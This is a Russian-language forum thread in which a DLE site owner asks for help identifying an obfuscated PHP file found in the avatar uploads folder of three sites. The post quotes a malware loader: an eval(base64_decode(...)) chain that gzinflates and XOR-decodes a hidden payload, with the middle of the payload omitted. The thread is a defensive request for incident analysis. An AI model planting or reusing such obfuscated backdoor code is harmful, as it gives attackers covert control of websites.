Перейти к публикации

Проверьте свои сайты


Рекомендованные сообщения

Нашел в папке /uploads/fotos файл с именем foto_868.php дата создания 30.12.2009 14:35:00

в файле шифрованный код.

Нашел на 3-х сайтах.

Файл не скриптом созданный.

Комп проверил касперычем+прогой http://www.safer-networking.org/ru/home/index.html

ничерта не нашел - все чисто.

Файлы, в которых антивирус нашел различия все скачал и сравнил и дефолтными. Все изменения я делал сам, ничего подозрительного не нашел.

Всю ночь рылся, так ничего не надыбал.

Черт возьми, как это Г на 3 сайта попало???

Есть ли возможность расшифровать или хотя бы понять, что там в этом php файле? То есть что он делает, для чего предназначен?

Вот его начало и конец, если кому надо, скину целиком:

<?php $o="TJ3HjuPclmYHdV/kckDgR6EaZKMH9N5BFB... 


далее целая страница этой шифрованной хрени и заканчивается так 


...WCoTNaEOy6cQQpaAFh+X///PPP///7n38B";eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGhVV2sxbFMyUk9jVzQ5SjJKaGMyVTJORjlrWldOdlpHVW5Pdz09IikpO2V2YWwoYmFzZTY0X2RlY29kZSgiSkhoSlEwOHdTVUpaVFU0OUozTjBjbXhsYmljNyIpKTskbz1nemluZmxhdGUoJHhUWk1lS2ROcW4oJG8pKTskeDZ0WFNxSzJKaD0keElDTzBJQllNTigkbyk7Zm9yKCR4cFBxZ1RUNGk3PTA7JHhwUHFnVFQ0aTc8JHg2dFhTcUsySmg7JHhwUHFnVFQ0aTcrKyl7JHhsMndLRWVLWDIuPWNocihvcmQoJG9bJHhwUHFnVFQ0aTddKV45KTt9ZXZhbCgkeGwyd0tFZUtYMik7"));return;?>

Есть соображения у кого?

PS Сделано именно под дле, судя из имени файла.

Изменено пользователем Langly
Ссылка на сообщение
Поделиться на других сайтах

проверил 5 сайтов, все чисто, скорее всего у тебя локальная проблема

Ссылка на сообщение
Поделиться на других сайтах

у меня тоже чисто

в папку uploads/fotos там аватары пользователей, и php файл невозможно туда загрузить

попробуйте открыть файл посматрите что показывает

www.site.ru/uploads/fotos/foto_868.php

Ссылка на сообщение
Поделиться на других сайтах

Скинь полный файл. Или дешифруй сам с помощью _base64.ru (там несколько раз шифровали по частям а потом все вместе).

Изменено пользователем axit
Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...